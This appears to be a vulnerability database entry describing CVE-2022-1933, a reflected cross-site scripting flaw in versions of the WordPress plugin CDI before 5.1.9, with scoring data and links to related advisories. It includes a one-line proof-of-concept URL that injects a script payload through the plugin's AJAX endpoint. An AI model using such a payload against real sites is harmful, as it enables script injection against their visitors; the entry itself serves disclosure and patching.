Lucene search
CydaveWPVDB-ID:6CEDB27F-6140-4CBA-836F-63DE98E521BFHistoryJun 21, 2022 - 12:00 a.m.
CDI < 5.1.9 - Reflected Cross-Site-Scripting
2022-06-2100:00:00
cydave
wpscan.com
14
cross-site-scripting
parameter sanitisation
ajax response
reflected xss
unauthenticated users
authenticated users
EPSS
0.001
Percentile
36.8%
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting
PoC
https://example.com/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk;=<script>alert(`xss`)</script> Note: PHP must be configured with --enable-soap as the plugin appears to import ‘SoapClient’, which when not found produces an error while installing the plugin.
Related
prion
prion
Cross site scripting
2022-07-17 11:15:00
patchstack
patchstack
cvelist
cvelist
CVE-2022-1933 CDI < 5.1.9 - Reflected Cross-Site-Scripting
2022-07-17 10:35:39
nvd
nvd
CVE-2022-1933
2022-07-17 11:15:08
cve
cve
CVE-2022-1933
2022-07-17 11:15:08
wpexploit
wpexploit
CDI < 5.1.9 - Reflected Cross-Site-Scripting
2022-06-21 00:00:00
cnvd
cnvd
WordPress plugin CDI cross-site scripting vulnerability
2022-07-19 00:00:00
nuclei
nuclei
WordPress CDI <5.1.9 - Cross Site Scripting
2022-11-25 11:01:47